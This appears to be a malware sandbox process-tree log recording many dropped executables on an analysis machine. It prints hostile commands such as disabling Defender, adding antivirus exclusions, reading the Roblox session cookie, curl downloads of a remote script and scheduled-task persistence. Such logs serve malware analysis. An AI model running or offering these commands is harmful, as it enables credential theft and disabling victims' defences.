-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"5⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4892
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
PID:4944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:1120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1840
-
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption5⤵PID:1364
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵
- System Location Discovery: System Language Discovery
PID:3960
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
PID:2736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
PID:3620
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:4228
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE" && pause5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5008 -
C:\Windows\SysWOW64\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5028
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe"3⤵
- Executes dropped EXE
PID:3808 -
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exeC:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe4⤵
- Executes dropped EXE
PID:4808
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exeC:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:3620
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exeC:\Users\Admin\AppData\Local\Temp\Files\XClient.exe4⤵
- Drops startup file
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1276 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'5⤵
- Drops file in Windows directory
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3220
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'5⤵
- System Location Discovery: System Language Discovery
PID:4580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3620
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'5⤵
- System Location Discovery: System Language Discovery
PID:1452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1624
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'5⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3712
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exeC:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe4⤵
- System Location Discovery: System Language Discovery
PID:3172
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"3⤵PID:2748
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE"3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE4⤵PID:2576
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE"3⤵PID:3372
-
C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE4⤵PID:4168
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"3⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\Files\test11.exeC:\Users\Admin\AppData\Local\Temp\Files\test11.exe4⤵PID:1772
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exeC:\Users\Admin\AppData\Local\Temp\Files\3546345.exe4⤵PID:1668
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"3⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\Files\loader.exeC:\Users\Admin\AppData\Local\Temp\Files\loader.exe4⤵PID:556
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "payload.bat"5⤵PID:5084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"6⤵PID:2680
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_PointingDevice get PNPDeviceID /value7⤵PID:2176
-
-
C:\Windows\system32\find.exefind "PNPDeviceID"7⤵PID:2792
-
-
-
C:\Windows\system32\curl.execurl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent6⤵PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exepython-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=06⤵PID:2040
-
C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe"C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=572 -burn.filehandle.self=724 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=07⤵PID:3244
-
C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe"C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{DD8DBF4A-4DF9-4D20-A26B-E7B742651D29} {5C8DA92E-CA20-43A2-9F21-ED3F3CF16F12} 32448⤵PID:3212
-
-
-
-
C:\Windows\system32\curl.execurl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure6⤵PID:4592
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE"3⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE4⤵PID:4976
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit5⤵PID:240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /k copy Emotions Emotions.cmd & Emotions.cmd & exit6⤵PID:2116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2876
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:3908
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"7⤵PID:3932
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:1324
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"7⤵PID:4776
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3695807⤵PID:4480
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MaskBathroomsCompoundInjection" Participants7⤵PID:4476
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z7⤵PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\369580\Origin.pif369580\Origin.pif 369580\Z7⤵PID:3584
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\Admin\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
PID:4528
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 157⤵
- Delays execution with timeout.exe
PID:3908
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"3⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exeC:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe4⤵PID:3980
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"5⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"5⤵PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"5⤵PID:660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 3325⤵
- Program crash
PID:4292
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE"3⤵PID:2256
-
C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE4⤵PID:2792
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"3⤵PID:3196
-
C:\Users\Admin\AppData\Local\Temp\Files\System.exeC:\Users\Admin\AppData\Local\Temp\Files\System.exe4⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"5⤵PID:1292
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'6⤵PID:1256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1636
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'6⤵PID:1764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1844
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'6⤵PID:5188
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5220
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'6⤵PID:5276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5352
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate5⤵PID:760
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"3⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exeC:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe4⤵PID:4604
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:4404
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:3960
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:1264
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:4856
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:880
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:4736
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:3228
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:5036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2024
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:3848
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3120
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch1⤵
- Executes dropped EXE
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3420 -
C:\Windows\SYSTEM32\rundll32.exerundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3360 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE"2⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXEC:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE3⤵
- Loads dropped DLL
- Checks processor information in registry
PID:4708
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"2⤵PID:4228
-
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exeC:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe3⤵
- Suspicious use of SetThreadContext
PID:4240 -
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"4⤵PID:3504
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE"2⤵PID:2476
-
C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXEC:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2188
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exeC:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe3⤵
- Checks computer location settings
PID:3228 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"4⤵PID:1792
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe5⤵
- Checks computer location settings
- Modifies registry class
PID:4316 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"6⤵
- Drops file in Windows directory
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe7⤵
- Checks computer location settings
PID:4404 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"8⤵
- System Location Discovery: System Language Discovery
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe9⤵
- Modifies registry class
PID:908 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"10⤵
- Drops file in Windows directory
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe11⤵
- Checks computer location settings
PID:1368 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3896 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe13⤵
- Modifies registry class
PID:2376 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"14⤵
- System Location Discovery: System Language Discovery
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe15⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3808 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"16⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe17⤵
- Checks computer location settings
- Modifies registry class
PID:3748 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"18⤵PID:2284
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe19⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:3280 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"20⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe21⤵
- Checks computer location settings
PID:664 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"22⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe23⤵
- Checks computer location settings
- Modifies registry class
PID:4960 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"24⤵
- Drops file in Windows directory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe25⤵
- Checks computer location settings
PID:3168 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"26⤵
- Drops file in Windows directory
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe27⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3384 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"28⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe29⤵
- Checks computer location settings
- Modifies registry class
PID:2080 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"30⤵
- Drops file in Windows directory
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe31⤵
- Checks computer location settings
- Modifies registry class
PID:2308 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"32⤵
